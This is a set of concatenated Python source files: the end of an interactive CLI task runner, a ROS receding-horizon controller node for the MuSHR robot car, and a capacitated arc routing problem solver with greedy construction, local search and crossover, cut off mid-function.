loading_bar.start()
thread.join()
loading_event.set()
loading_bar.join()
if args.exit_early:
finished, task_id, args = begin_task(data_collector, task_id, args)
else:
while not finished:
finished, task_id, args = begin_task(data_collector, task_id, args)
def begin_task(data_collector: DataCollector, task_id: str, args) -> bool:
"""Function to handle task selection and the flow of the program
Args:
data_collector (DataCollector): Instance of the DataCollector class used to process the file.
task_id (str): The validated identifier of the task to begin running
args (Namespace): The CLI arguments
Returns:
bool: Indicates if the program is complete
"""
run_task = task_picker.get(task_id, raise_invalid_task)
print('------------------ Task: {} ------------------'.format(task_id))
run_task(data_collector, args)
print()
next_task = next_item(task_id)
finished = None
if args is not None:
finished = not args.exit_early
if finished is True:
finished = None
while finished is None:
try:
finished = str2bool(check_exit(input('Continue to task {} [Y/n] (e for exit)? '.format(next_task))))
if finished is False:
finished = str2bool(check_exit(input('Jump to new task [Y/n] (e for exit)? ')))
if finished is False:
break
next_task = validate_task(input('Enter task to run {}: '.format(task_picker.keys())))
except ArgumentTypeError as e:
logger.warning('Invalid argument provided, expecting a boolean value')
finished = None
continue
except InvalidTaskIDError as e:
logger.warning('Invalid task ID entered')
finished = None
continue
args = None
return not finished, next_task, args
#@debug
def get_doc_uuid(args) -> str:
"""Helper function to get the document UUID
Args:
args (Namespace): The CLI arguments
Returns:
str: Document UUID
"""
if args is None or not hasattr(args, 'doc_uuid'):
doc_uuid = input('Doc UUID must be specified: ')
else:
if args.doc_uuid is None:
doc_uuid = input('Doc UUID must be specified: ')
else:
doc_uuid = args.doc_uuid
doc_uuid = validate_doc_uuid(doc_uuid)
return doc_uuid
def get_user_uuid(args) -> str:
"""Helper function to get the user UUID
Args:
args (Namespace): The CLI arguments
Returns:
str: User UUID
"""
if args is None or not hasattr(args, 'user_uuid'):
user_uuid = input('User UUID: ')
else:
user_uuid = args.user_uuid
if user_uuid is not None:
user_uuid = validate_user_uuid(user_uuid)
return user_uuid
def get_n(args) -> int:
"""Helper function to get the n parameter
Args:
args (Namespace): The CLI arguments
Returns:
int: n
"""
if args is None or not hasattr(args, 'limit_data'):
return None
else:
return args.limit_data
def loading_data(done_event: Event) -> None:
"""Display a loading bar while the data is being loaded
Args:
done_event (Event): An event that gets set when the loading bar finishes
"""
with alive_bar(title='Processing data file...', total=None) as bar:
while not done_event.is_set():
bar()
sleep(0.1)
def check_exit(string: str) -> str:
"""Verify if the exit flag has been entered by the user
Args:
string (str): String entered by the user
Returns:
str: returns the unmodified string
"""
if string.lower() == 'e':
sys.exit(0)
return string
|
rhcnode.py | #!/usr/bin/env python
# Copyright (c) 2019, The Personal Robotics Lab, The MuSHR Team, The Contributors of MuSHR
# License: BSD 3-Clause. See LICENSE.md file in root directory.
import cProfile
import os
import signal
import threading
import rospy
from ackermann_msgs.msg import AckermannDriveStamped
from geometry_msgs.msg import Point, PoseStamped
from std_msgs.msg import ColorRGBA, Empty
from std_srvs.srv import Empty as SrvEmpty
from visualization_msgs.msg import Marker
import logger
import parameters
import rhcbase
import rhctensor
import utils
class RHCNode(rhcbase.RHCBase):
def __init__(self, dtype, params, logger, name):
rospy.init_node(name, anonymous=True, disable_signals=True)
super(RHCNode, self).__init__(dtype, params, logger)
self.reset_lock = threading.Lock()
self.inferred_pose_lock = threading.Lock()
self._inferred_pose = None
self.cur_rollout = self.cur_rollout_ip = None
self.traj_pub_lock = threading.Lock()
self.goal_event = threading.Event()
self.map_metadata_event = threading.Event()
self.ready_event = threading.Event()
self.events = [self.goal_event, self.map_metadata_event, self.ready_event]
self.run = True
self.do_profile = self.params.get_bool("profile", default=False)
def start_profile(self):
if self.do_profile:
self.logger.warn("Running with profiling")
self.pr = cProfile.Profile()
self.pr.enable()
def end_profile(self):
if self.do_profile:
self.pr.disable()
self.pr.dump_stats(os.path.expanduser("~/mushr_rhc_stats.prof"))
def start(self):
self.logger.info("Starting RHController")
self.start_profile()
self.setup_pub_sub()
self.rhctrl = self.load_controller()
self.T = self.params.get_int("T")
self.ready_event.set()
rate = rospy.Rate(50)
self.logger.info("Initialized")
while not rospy.is_shutdown() and self.run:
ip = self.inferred_pose()
next_traj, rollout = self.run_loop(ip)
with self.traj_pub_lock:
if rollout is not None:
self.cur_rollout = rollout.clone()
self.cur_rollout_ip = ip
if next_traj is not None:
self.publish_traj(next_traj, rollout)
# For experiments. If the car is at the goal, notify the
# experiment tool
if self.rhctrl.at_goal(self.inferred_pose()):
self.expr_at_goal.publish(Empty())
self.goal_event.clear()
rate.sleep()
self.end_profile()
def run_loop(self, ip):
self.goal_event.wait()
if rospy.is_shutdown() or ip is None:
return None, None
with self.reset_lock:
# If a reset is initialed after the goal_event was set, the goal
# will be cleared. So we have to have another goal check here.
if not self.goal_event.is_set():
return None, None
if ip is not None:
return self.rhctrl.step(ip)
self.logger.err("Shouldn't get here: run_loop")
def shutdown(self, signum, frame):
rospy.signal_shutdown("SIGINT recieved")
self.run = False
for ev in self.events:
ev.set()
def setup_pub_sub(self):
rospy.Service("~reset/soft", SrvEmpty, self.srv_reset_soft)
rospy.Service("~reset/hard", SrvEmpty, self.srv_reset_hard)
car_name = self.params.get_str("car_name", default="car")
rospy.Subscriber(
"/move_base_simple/goal", PoseStamped, self.cb_goal, queue_size=1
)
rospy.Subscriber(
"/" + car_name + "/" + rospy.get_param("~inferred_pose_t"),
PoseStamped,
self.cb_pose,
queue_size=10,
)
self.rp_ctrls = rospy.Publisher(
"/"
+ car_name
+ "/"
+ self.params.get_str(
"ctrl_topic", default="mux/ackermann_cmd_mux/input/navigation"
),
AckermannDriveStamped,
queue_size=2,
)
traj_chosen_t = self.params.get_str("traj_chosen_topic", default="~traj_chosen")
self.traj_chosen_pub = rospy.Publisher(traj_chosen_t, Marker, queue_size=10)
# For the experiment framework, need indicators to listen on
self.expr_at_goal = rospy.Publisher("experiments/finished", Empty, queue_size=1)
def srv_reset_hard(self, msg):
"""
Hard reset does a complete reload of the controller
"""
rospy.loginfo("Start hard reset")
self.reset_lock.acquire()
self.load_controller()
self.goal_event.clear()
self.reset_lock.release()
rospy.loginfo("End hard reset")
return []
def srv_reset_soft(self, msg):
"""
Soft reset only resets soft state (like tensors). No dependencies or maps
are reloaded
"""
rospy.loginfo("Start soft reset")
self.reset_lock.acquire()
self.rhctrl.reset()
self.goal_event.clear()
self.reset_lock.release()
rospy.loginfo("End soft reset")
return []
def cb_goal(self, msg):
goal = self.dtype(utils.rospose_to_posetup(msg.pose))
self.ready_event.wait()
if not self.rhctrl.set_goal(goal):
self.logger.err("That goal is unreachable, please choose another")
return
else:
self.logger.info("Goal set")
self.goal_event.set()
def cb_pose(self, msg):
self.set_inferred_pose(self.dtype(utils.rospose_to_posetup(msg.pose)))
if self.cur_rollout is not None and self.cur_rollout_ip is not None:
m = Marker()
m.header.frame_id = "map"
m.type = m.LINE_STRIP
m.action = m.ADD
with self.traj_pub_lock:
pts = (
self.cur_rollout[:, :2] - self.cur_rollout_ip[:2]
) + self.inferred_pose()[:2]
m.points = map(lambda xy: Point(x=xy[0], y=xy[1]), pts)
r, g, b = 0x36, 0xCD, 0xC4
m.colors = [ColorRGBA(r=r / 255.0, g=g / 255.0, b=b / 255.0, a=0.7)] * len(
m.points
)
m.scale.x = 0.05
self.traj_chosen_pub.publish(m)
def publish_traj(self, traj, rollout):
assert traj.size() == (self.T, 2)
assert rollout.size() == (self.T, 3)
ctrl = traj[0]
ctrlmsg = AckermannDriveStamped()
ctrlmsg.header.stamp = rospy.Time.now()
ctrlmsg.drive.speed = ctrl[0]
ctrlmsg.drive.steering_angle = ctrl[1]
self.rp_ctrls.publish(ctrlmsg)
def set_inferred_pose(self, ip):
with self.inferred_pose_lock:
self._inferred_pose = ip
def inferred_pose(self):
with self.inferred_pose_lock:
return self._inferred_pose
if __name__ == "__main__":
params = parameters.RosParams()
logger = logger.RosLog()
node = RHCNode(rhctensor.float_tensor(), params, logger, "rhcontroller")
signal.signal(signal.SIGINT, node.shutdown)
rhc = threading.Thread(target=node.start)
rhc.start()
# wait for a signal to shutdown
while node.run:
signal.pause()
rhc.join()
|
CARP_solver.py | import sys
import queue
import random
import time
import copy
import numpy as np
from multiprocessing import Process,Queue
file_path=sys.argv[1]
termin_time=sys.argv[3]
random_seed=sys.argv[5]
start=time.time()
random.seed(random_seed)
f=open(file_path,encoding='utf-8')
sentimentlist = []
for line in f:
s = line.strip().split('\t')
slist=s[0].split()
sentimentlist.append(slist)
f.close()
vertices=0
depot=0
required=0
non_required=0
vehicles=0
capacity=0
total_cost=0
edge_list=[]
for i in sentimentlist:
if i[0]=='VERTICES':
vertices=int(i[2])
elif i[0]=='DEPOT':
depot=int(i[2])
elif i[0]=='REQUIRED':
required=int(i[3])
elif i[0]=='NON-REQUIRED':
non_required=int(i[3])
elif i[0]=='VEHICLES':
vehicles=int(i[2])
elif i[0]=='CAPACITY':
capacity=int(i[2])
elif i[0]=='TOTAL':
total_cost=int(i[6])
elif str.isdigit(i[0]):
edge_list.append(i)
class Node(object):
def __init__(self, dis, index):
self.dis = dis
self.index = index
def __lt__(self, other):
if self.dis!=other.dis:
return self.dis < other.dis
elif self.dis==other.dis:
p=np.random.rand()
if p>0.5 :return True
else: return False
class Edge(object):
def __init__(self, s, t ,c ,d ):
self.s = s
self.t = t
self.c = c
self.d = d
def __lt__(self, other):
if self.d!=other.d:
return self.d < other.d
elif self.d==other.d:
p=np.random.rand()
if p>0.5 :return True
else: return False
class Individual(object):
def __init__(self, gene,q):
self.gene=gene
self.q=q
def __lt__(self, other):
return self.q < other.q
class Graph:
def __init__(self,n_vertices,depot,required,non_required,vehicles,capacity,total_cost,edge_list):
self._n_vertices = n_vertices
self._depot=depot
self._required=required
self._non_required=non_required
self._vehicles=vehicles
self._capacity=capacity
self._total_cost=total_cost
self._edge_list=edge_list
self._all_distance= [[0 for _ in range(n_vertices+1)] for _ in range(n_vertices+1)]
self._adj = [[] for _ in range(n_vertices+1)]
self.cost_dic={}
self.demand_dic={}
self.task_dic={}
self.id_dic={}
idcounter=1
for i in self._edge_list:
s=int(i[0])
t=int(i[1])
c=int(i[2])
d=int(i[3])
self.add_edge(s,t)
self.add_edge(t,s)
self.cost_dic[(s,t)]=c
self.cost_dic[(t,s)]=c
self.demand_dic[(s,t)]=d
self.demand_dic[(t,s)]=d
self.task_dic[idcounter]=(s,t)
self.task_dic[-idcounter]=(t,s)
self.id_dic[(s,t)]=idcounter
self.id_dic[(t,s)]=-idcounter
idcounter+=1
# for i in range(1,n_vertices+1):
# for j in range(1,n_vertices+1):
# self._all_distance[i][j]=self.dijkstra(i, j)
for i in range(1,n_vertices+1):
for j in range(1,n_vertices+1):
if (i,j) in self.cost_dic:
self._all_distance[i][j]=self.cost_dic[(i,j)]
elif i==j:
self._all_distance[i][j]=0
else:
self._all_distance[i][j]=10000000000000
for k in range(1,n_vertices+1):
for i in range(1,n_vertices+1):
for j in range(1,n_vertices+1):
if self._all_distance[i][j]> self._all_distance[i][k]+self._all_distance[k][j]:
self._all_distance[i][j]=self._all_distance[i][k]+self._all_distance[k][j]
# print(time.time()-start)
self.tasklist=[]
self.tasklist2=[]
for i in self._edge_list:
s=int(i[0])
t=int(i[1])
c=int(i[2])
d=int(i[3])
if d!=0:
self.tasklist.append(Edge(s,t,c,d))
self.tasklist2.append([s,t,c,d])
def add_edge(self, s, t):
self._adj[s].append(t)
def dijkstra(self, s ,t):
S=set()
visit=set()
disdic={}
pq = queue.PriorityQueue()
for i in range(1,self._n_vertices+1):
if i !=s:
disdic[i]=1000000000000
pq.put_nowait(Node(1000000000000,i))
else:
disdic[i]=0
pq.put_nowait(Node(0,i))
while not pq.empty():
u = pq.get()
u_index=u.index
if u_index not in visit:
if u_index==t:
return u.dis
visit.add(u_index)
for i in self._adj[u_index]:
if disdic[u_index]+self.cost_dic[(u_index,i)] <disdic[i]:
pq.put_nowait(Node(disdic[u_index]+self.cost_dic[(u_index,i)],i))
disdic[i]=disdic[u_index]+self.cost_dic[(u_index,i)]
def finish_one_task(self,s,t):
cost_sum=0
cost_sum+=self._all_distance[self._depot][t]
cost_sum+=self._all_distance[self._depot][s]
cost_sum+=self.cost_dic[(s,t)]
return cost_sum
def gene_to_string(self,gene):
sline='s '
first=True
for i in gene:
if i==[]:
continue
first_task=True
for j in i:
# j=self.task_dic[j]
task=self.task_dic[j]
# task=j
if first:
addstr=f'0,({task[0]},{task[1]})'
sline=sline+addstr
first=False
first_task=False
else:
if first_task:
addstr=f',0,({task[0]},{task[1]})'
sline=sline+addstr
first_task=False
else:
addstr=f',({task[0]},{task[1]})'
sline=sline+addstr
addstr=f',0'
sline=sline+addstr
return sline
def gene_to_q(self,gene):
q=0
for i in gene:
now=self._depot
for j in i:
j=self.task_dic[j]
# if self._all_distance[j[0]][now]!=0:
# print(f'Dijkstra: go from {now} to {j[0]} and cost is {self._all_distance[j[0]][now]}')
# print(f'Cost: go from {j[0]} to {j[1]} and cost is {self.cost_dic[j]}')
q+=self._all_distance[j[0]][now]
q+=self.cost_dic[j]
now=j[1]
# if now!= self._depot:
# print(f'Dijkstra: go from {now} to {self._depot} and cost is {self._all_distance[now][self._depot]}')
q+=self._all_distance[now][self._depot]
# print('Next_Car')
return f'q {q}'
def get_q(self,gene):
q=0
for i in gene:
now=self._depot
for j in i:
j=self.task_dic[j]
# print(f'Dijkstra: go from {now} to {j[0]} and cost is {self._all_distance[j[0]][now]}')
# print(f'Cost: go from {j[0]} to {j[1]} and cost is {self.cost_dic[j]}')
q+=self._all_distance[j[0]][now]
q+=self.cost_dic[j]
now=j[1]
# if now!= self._depot:
# print(f'Dijkstra: go from {now} to {self._depot} and cost is {self._all_distance[now][self._depot]}')
q+=self._all_distance[now][self._depot]
# print('Next_Car')
return q
def gene_output(self,gene):
print(self.gene_to_string(gene[:]))
print(self.gene_to_q(gene[:]))
def get_gene(self):
tasklist=queue.PriorityQueue()
for i in self._edge_list:
s=int(i[0])
t=int(i[1])
c=int(i[2])
d=int(i[3])
if d!=0:
tasklist.put_nowait(Edge(s,t,c,d))
candidate=[]
route=[]
gene=[]
now=self._depot
task_sum=0
while not tasklist.empty():
while not tasklist.empty():
leastd=tasklist.get()
if leastd.d+task_sum<=self._capacity:
candidate.append(leastd)
else:
tasklist.put_nowait(leastd)
break
if len(candidate)==0:
task_sum=0
gene.append(route)
route=[]
now=self._depot
else:
min_distance=1000000000
min_list=[]
for i in range(len(candidate)):
taski=candidate[i]
disx=self._all_distance[taski.s][now]
disy=self._all_distance[taski.t][now]
if disx<min_distance :
min_list=[]
min_list.append((i,True))
min_distance=disx
elif disx==min_distance:
min_list.append((i,True))
min_distance=disx
if disy<min_distance:
min_list=[]
min_list.append((i,False))
min_distance=disy
elif disy==min_distance:
min_list.append((i,False))
min_distance=disy
k=random.randint(0,len(min_list)-1)
min_index=min_list[k][0]
min_s=min_list[k][1]
min_task=candidate.pop(min_index)
if not min_s:
temp=min_task.s
min_task.s=min_task.t
min_task.t=temp
for i in candidate:
tasklist.put_nowait(i)
candidate=[]
task_sum+=min_task.d
route.append(self.id_dic[(min_task.s,min_task.t)])
now=min_task.t
gene.append(route)
task_sum=0
now=self._depot
return gene
def get_gene2(self):
tasklist=copy.deepcopy(self.tasklist2)
route=[]
gene=[]
now=self._depot
task_sum=0
while len(tasklist)>0:
tasklist.sort(key = lambda x:min(graph._all_distance[now][x[0]],graph._all_distance[now][x[1]]))
min_list=[]
min_dis=min(self._all_distance[now][tasklist[0][0]],self._all_distance[now][tasklist[0][1]])
for i in tasklist:
if min(self._all_distance[now][i[0]],self._all_distance[now][i[1]])==min_dis and i[3]+task_sum<self._capacity :
min_list.append(i)
if min_list==[]:
task_sum=0
gene.append(route)
route=[]
now=self._depot
continue
np.random.shuffle(min_list)
min_task=min_list[0]
tasklist.remove(min_task)
task_sum+=min_task[3]
if self._all_distance[now][min_task[0]]<self._all_distance[now][min_task[1]]:
route.append(self.id_dic[(min_task[0],min_task[1])])
else:
route.append(self.id_dic[(min_task[1],min_task[0])])
now=min_task[1]
if now==self._depot:
task_sum=0
gene.append(route)
route=[]
gene.append(route)
task_sum=0
now=self._depot
return gene
def single_insertion(self,gene,p,k1,k2,k3):
routek=gene[k1]
if len(routek)>1:
pass
else:
k2=-1
if k2!=-1:
task_k_index=routek.pop(k2)
task_k=self.task_dic[task_k_index]
rp=random.random()
if rp < p:
if len(routek)==0:
insert_index=0
routek.append(task_k_index)
else:
insert_index=k3
if insert_index==0:
after=self.task_dic[routek[insert_index]]
disx=self._all_distance[self._depot][task_k[0]]+self.cost_dic[task_k]+self._all_distance[task_k[1]][after[0]]
disy=self._all_distance[self._depot][task_k[1]]+self.cost_dic[task_k]+self._all_distance[task_k[0]][after[0]]
if disx<disy:
routek.insert(insert_index,self.id_dic[task_k])
else:
routek.insert(insert_index,self.id_dic[(task_k[1],task_k[0])])
elif insert_index==(len(routek)-1):
before=self.task_dic[routek[insert_index]]
disx=self._all_distance[before[1]][task_k[0]]+self.cost_dic[task_k]+self._all_distance[task_k[1]][self._depot]
disy=self._all_distance[before[1]][task_k[1]]+self.cost_dic[task_k]+self._all_distance[task_k[0]][self._depot]
if disx<disy:
routek.append(self.id_dic[task_k])
else:
routek.append(self.id_dic[(task_k[1],task_k[0])])
else:
before=self.task_dic[routek[insert_index-1]]
after=self.task_dic[routek[insert_index]]
disx=self._all_distance[before[1]][task_k[0]]+self.cost_dic[task_k]+self._all_distance[task_k[1]][after[0]]
disy=self._all_distance[before[1]][task_k[1]]+self.cost_dic[task_k]+self._all_distance[task_k[0]][after[0]]
if disx<disy:
routek.insert(insert_index,self.id_dic[task_k])
else:
routek.insert(insert_index,self.id_dic[(task_k[1],task_k[0])])
else:
if routek==[]:
gene.pop(k1)
return gene
def double_insertion(self,gene,p,k1,k2,k3):
routek=gene[k1]
if len(routek)>2:
pass
else:
k2=-1
if k2!=-1:
task_k_index=routek.pop(k2)
task_k_index2=routek.pop(k2)
task_k=self.task_dic[task_k_index]
task_k2=self.task_dic[task_k_index2]
rp=random.random()
if rp < p:
if len(routek)==0:
routek.append(task_k_index)
else:
insert_index=k3
if insert_index== 0:
after=self.task_dic[routek[insert_index]]
disx=self._all_distance[self._depot][task_k[0]]+self._all_distance[task_k2[1]][after[0]]
disy=self._all_distance[self._depot][task_k2[1]]+self._all_distance[task_k[0]][after[0]]
if disx<disy:
routek.insert(insert_index,self.id_dic[(task_k[0],task_k[1])])
routek.insert(insert_index,self.id_dic[(task_k2[0],task_k2[1])])
else:
routek.insert(insert_index,self.id_dic[(task_k2[1],task_k2[0])])
routek.insert(insert_index,self.id_dic[(task_k[1],task_k[0])])
elif insert_index==(len(routek)-1):
before=self.task_dic[routek[insert_index]]
disx=self._all_distance[before[1]][task_k[0]]+self._all_distance[task_k2[1]][self._depot]
disy=self._all_distance[before[1]][task_k2[1]]+self._all_distance[task_k[0]][self._depot]
if disx<disy:
routek.append(self.id_dic[(task_k[0],task_k[1])])
routek.append(self.id_dic[(task_k2[0],task_k2[1])])
else:
routek.append(self.id_dic[(task_k2[1],task_k2[0])])
routek.append(self.id_dic[(task_k[1],task_k[0])])
else:
before=self.task_dic[routek[insert_index-1]]
after=self.task_dic[routek[insert_index]]
disx=self._all_distance[before[1]][task_k[0]]+self._all_distance[task_k2[1]][after[0]]
disy=self._all_distance[before[1]][task_k2[1]]+self._all_distance[task_k[0]][after[0]]
if disx<disy:
routek.insert(insert_index,self.id_dic[(task_k[0],task_k[1])])
routek.insert(insert_index,self.id_dic[(task_k2[0],task_k2[1])])
else:
routek.insert(insert_index,self.id_dic[(task_k2[1],task_k2[0])])
routek.insert(insert_index,self.id_dic[(task_k[1],task_k[0])])
else:
if routek==[]:
gene.pop(k1)
route=[]
route.append(self.id_dic[(task_k[0],task_k[1])])
route.append(self.id_dic[(task_k2[0],task_k2[1])])
gene.append(route)
return gene
def swap(self,gene,k1,k2,k3):
routek=gene[k1]
if len(routek)>2:
pass
else:
k2=-1
if k2!=-1:
task_k_index=routek[k2]
task_k_index2=routek[k3]
task_k=self.task_dic[task_k_index]
task_k2=self.task_dic[task_k_index2]
if k2==0:
after=self.task_dic[routek[k2+1]]
disx=self._all_distance[self._depot][task_k2[0]]+self._all_distance[task_k2[1]][after[0]]
disy=self._all_distance[self._depot][task_k2[1]]+self._all_distance[task_k2[0]][after[0]]
if disx<disy:
routek.pop(k2)
routek.insert(k2,self.id_dic[(task_k2[0],task_k2[1])])
else:
routek.pop(k2)
routek.insert(k2,self.id_dic[(task_k2[1],task_k2[0])])
elif k2== len(routek)-1:
before=self.task_dic[routek[k2-1]]
disx=self._all_distance[before[1]][task_k2[0]]+self._all_distance[task_k2[1]][self._depot]
disy=self._all_distance[before[1]][task_k2[1]]+self._all_distance[task_k2[0]][self._depot]
if disx<disy:
routek.pop(k2)
routek.insert(k2,self.id_dic[(task_k2[0],task_k2[1])])
else:
routek.pop(k2)
routek.insert(k2,self.id_dic[(task_k2[1],task_k2[0])])
else:
before=self.task_dic[routek[k2-1]]
after=self.task_dic[routek[k2+1]]
disx=self._all_distance[before[1]][task_k2[0]]+self._all_distance[task_k2[1]][after[0]]
disy=self._all_distance[before[1]][task_k2[1]]+self._all_distance[task_k2[0]][after[0]]
if disx<disy:
routek.pop(k2)
routek.insert(k2,self.id_dic[(task_k2[0],task_k2[1])])
else:
routek.pop(k2)
routek.insert(k2,self.id_dic[(task_k2[1],task_k2[0])])
if k3==0:
after=self.task_dic[routek[k3+1]]
disx=self._all_distance[self._depot][task_k[0]]+self._all_distance[task_k[1]][after[0]]
disy=self._all_distance[self._depot][task_k[1]]+self._all_distance[task_k[0]][after[0]]
if disx<disy:
routek.pop(k3)
routek.insert(k3,self.id_dic[(task_k[0],task_k[1])])
else:
routek.pop(k3)
routek.insert(k3,self.id_dic[(task_k[1],task_k[0])])
elif k3== len(routek)-1:
before=self.task_dic[routek[k3-1]]
disx=self._all_distance[before[1]][task_k[0]]+self._all_distance[task_k[1]][self._depot]
disy=self._all_distance[before[1]][task_k[1]]+self._all_distance[task_k[0]][self._depot]
if disx<disy:
routek.pop(k3)
routek.insert(k3,self.id_dic[(task_k[0],task_k[1])])
else:
routek.pop(k3)
routek.insert(k3,self.id_dic[(task_k[1],task_k[0])])
else:
before=self.task_dic[routek[k3-1]]
after=self.task_dic[routek[k3+1]]
disx=self._all_distance[before[1]][task_k[0]]+self._all_distance[task_k[1]][after[0]]
disy=self._all_distance[before[1]][task_k[1]]+self._all_distance[task_k[0]][after[0]]
if disx<disy:
routek.pop(k3)
routek.insert(k3,self.id_dic[(task_k[0],task_k[1])])
else:
routek.pop(k3)
routek.insert(k3,self.id_dic[(task_k[1],task_k[0])])
return gene
def list_2_tuple(self,lst):
result=[]
for i in lst:
ti=tuple(i)
result.append(ti)
return tuple(result)
def single_local_search(self,gene):
before=1000000
best_q=1000000
best_gene=gene
time_out=False
while True:
if time_out:
break
for i in range(len(gene)):
if time_out:
break
if len(gene[i])>1:
for j in range(len(gene[i])):
if time_out:
break
for k in range(len(gene[i])-1):
if time.time()-start>float(termin_time)-0.5:
time_out=True
if time_out:
break
copy_gene=copy.deepcopy(gene)
self.single_insertion(copy_gene,1,i,j,k)
q=self.get_q(copy_gene)
if q<best_q:
best_gene=copy_gene
best_q=q
if best_q==before:
break
else:
before=best_q
return best_gene
def double_local_search(self,gene):
before=1000000
best_q=1000000
best_gene=gene
time_out=False
while True:
if time_out:
break
for i in range(len(gene)):
if time_out:
break
if len(gene[i])>2:
for j in range(len(gene[i])-1):
if time_out:
break
for k in range(len(gene[i])-2):
if time.time()-start>float(termin_time)-0.5:
time_out=True
if time_out:
break
copy_gene=copy.deepcopy(gene)
self.double_insertion(copy_gene,1,i,j,k)
q=self.get_q(copy_gene)
if q<best_q:
best_gene=copy_gene
best_q=q
if best_q==before:
break
else:
before=best_q
return best_gene
def swap_local_search(self,gene):
before=1000000
best_q=1000000
best_gene=gene
time_out=False
while True:
if time_out:
break
for i in range(len(gene)):
if time_out:
break
if len(gene[i])>2:
for j in range(len(gene[i])):
if time_out:
break
for k in range(len(gene[i])):
if k!=j:
if time.time()-start>float(termin_time)-0.5:
time_out=True
if time_out:
break
copy_gene=copy.deepcopy(gene)
self.swap(copy_gene,i,j,k)
q=self.get_q(copy_gene)
if q<best_q:
best_gene=copy_gene
best_q=q
if best_q==before:
break
else:
before=best_q
return best_gene
def Ulusoy_split(self,ordered_list):
V=[0 for i in range(len(ordered_list)+1)]
P=[0 for i in range(len(ordered_list)+1)]
length=len(ordered_list)
for i in range(1,length+1):
V[i]=1000000000
for t in range(1,length+1):
i=t-1
j=i
load=0
cost=0
before_task=None
while j<length:
task=self.task_dic[ordered_list[j]]
load+=self.demand_dic[task]
if i==j:
cost=self._all_distance[self._depot][task[0]]+self.cost_dic[task]+self._all_distance[self._depot][task[1]]
else:
cost=self._all_distance[before_task[1]][task[0]]+self.cost_dic[task]+self._all_distance[self._depot][task[1]]-self._all_distance[self._depot][before_task[1]]
if load<=self._capacity:
v_new=V[t-1]+cost
if v_new<V[j+1]:
V[j+1]=v_new
P[j+1]=t-1
before_task=task
j+=1
else:
break
output=[]
j=length
ptr=P[j]
while ptr>0:
route=[]
for k in range(ptr,j):
route.append(ordered_list[k])
output.append(route)
j=ptr
ptr=P[j]
route=[]
for k in range(0,j):
route.append(ordered_list[k])
output.append(route)
return output
def flatten(self,gene):
output=[]
for i in gene:
for j in i:
output.append(j)
return output
def merge(self,gene,list):
output=[]
left=[]
for i in range(len(gene)):
if i in list:
output.append(gene[i])
else:
left.append(gene[i])
return output,left
def MS_local_search(self,gene):
min_split=None
min_left=None
min_score=10000000000
counter=0
for i in range(len(gene)):
for j in range(i+1,len(gene)):
counter+=1
if counter>100:
pass
else:
for i in range(5):
random_select,left=graph.merge(gene,[i,j])
split1=graph.Ulusoy_split(graph.PS1(copy.deepcopy(graph.flatten(random_select))))
split2=graph.Ulusoy_split(graph.PS2(copy.deepcopy(graph.flatten(random_select))))
split3=graph.Ulusoy_split(graph.PS3(copy.deepcopy(graph.flatten(random_select))))
split4=graph.Ulusoy_split(graph.PS4(copy.deepcopy(graph.flatten(random_select))))
split5=graph.Ulusoy_split(graph.PS5(copy.deepcopy(graph.flatten(random_select))))
score1=self.get_q(split1)
score2=self.get_q(split2)
score3=self.get_q(split3)
score4=self.get_q(split4)
score5=self.get_q(split5)
if score1<min_score:
min_score=score1
min_split=split1
min_left=left
if score2<min_score:
min_score=score2
min_split=split2
min_left=left
if score3<min_score:
min_score=score3
min_split=split3
min_left=left
if score4<min_score:
min_score=score4
min_split=split4
min_left=left
if score5<min_score:
min_score=score5
min_split=split5
min_left=left
for i in min_left:
min_split.append(i)
return min_split
def best_BIH(self):
population=queue.PriorityQueue()
gene_set=set()
counter=0
misstime=0
while time.time()-start<float(termin_time):
copy_gene=self.get_gene2()
tuple_gene=self.list_2_tuple(copy_gene)
if tuple_gene not in gene_set:
counter+=1
gene_set.add(tuple_gene)
new_individual=Individual(copy_gene, self.get_q(copy_gene))
population.put_nowait(new_individual)
misstime=0
else:
misstime+=1
if misstime>100:
break
best=population.get()
self.gene_output(best.gene)
def cross_over(self,gene1,gene2):
k1=random.randint(0,len(gene1)-1)
k2=random.randint(0,len(gene2)-1)
# print(k1)
# print(k2)
R1=gene1[k1]
R2=gene2[k2]
# print(f'R1 is {R1}')
# print(f'R2 is {R2}')
while len(R1)<2:
k1=random.randint(0,len(gene1)-1)
R1=gene1[k1]
while len(R2)<2:
k2=random.randint(0,len(gene2)-1)
R2=gene2[k2]
s1=random.randint(1,len(R1)-1)
s2=random.randint(1,len(R2)-1)
R11=R1[:s1]
R22=R2[s2:]
new=R11+R22
miss=[]
dup=[]
for i in new:
if i not in R1:
dup.append(i)
for i in R1:
if i not in new:
miss.append(i)
for i in dup:
new.remove(i)
for i in miss:
task_k=self.task_dic[i]
min_distance=1000000000
min_list=[]
for j in range(len(new)):
insert_index=j
if insert_index==0:
after=self.task_dic[new[insert_index]]
disx=self._all_distance[self._depot][task_k[0]]+self.cost_dic[task_k]+self._all_distance[task_k[1]][after[0]]
disy=self._all_distance[self._depot][task_k[1]]+self.cost_dic[task_k]+self._all_distance[task_k[0]][after[0]]
if disx<min_distance :
min_list=[]
min_list.append((j,True))
min_distance=disx
elif disx==min_distance:
min_list.append((j,True))
min_distance=disx
if disy<min_distance:
min_list=[]
min_list.append((j,False))
min_distance=disy
elif disy==min_distance:
min_list.append((j,False))
min_distance=disy
elif insert_index==(len(new)-1):
before=self.task_dic[new[insert_index]]
disx=self._all_distance[before[1]][task_k[0]]+self.cost_dic[task_k]+self._all_distance[task_k[1]][self._depot]
disy=self._all_distance[before[1]][task_k[1]]+self.cost_dic[task_k]+self._all_distance[task_k[0]][self._depot]
if disx<min_distance :
min_list=[]
min_list.append((j,True))
min_distance=disx
elif disx==min_distance:
min_list.append((j,True))
min_distance=disx
if disy<min_distance:
min_list=[]
min_list.append((j,False))
min_distance=disy
elif disy==min_distance:
min_list.append((j,False))
min_distance=disy
else:
before=self.task_dic[new[insert_index-1]]
after=self.task_dic[new[insert_index]]
disx=self._all_distance[before[1]][task_k[0]]+self.cost_dic[task_k]+self._all_distance[task_k[1]][after[0]]
disy=self._all_distance[before[1]][task_k[1]]+self.cost_dic[task_k]+self._all_distance[task_k[0]][after[0]]
if disx<min_distance :
min_list=[]
min_list.append((j,True))
min_distance=disx
elif disx==min_distance:
min_list.append((j,True))
min_distance=disx
if disy<min_distance:
min_list=[]
min_list.append((j,False))
min_distance=disy
elif disy==min_distance:
min_list.append((j,False))
min_distance=disy
k=random.randint(0,len(min_list)-1)
min_index=min_list[k][0]
min_s=min_list[k][1]
if not min_s:
task_k=(task_k[1],task_k[0])
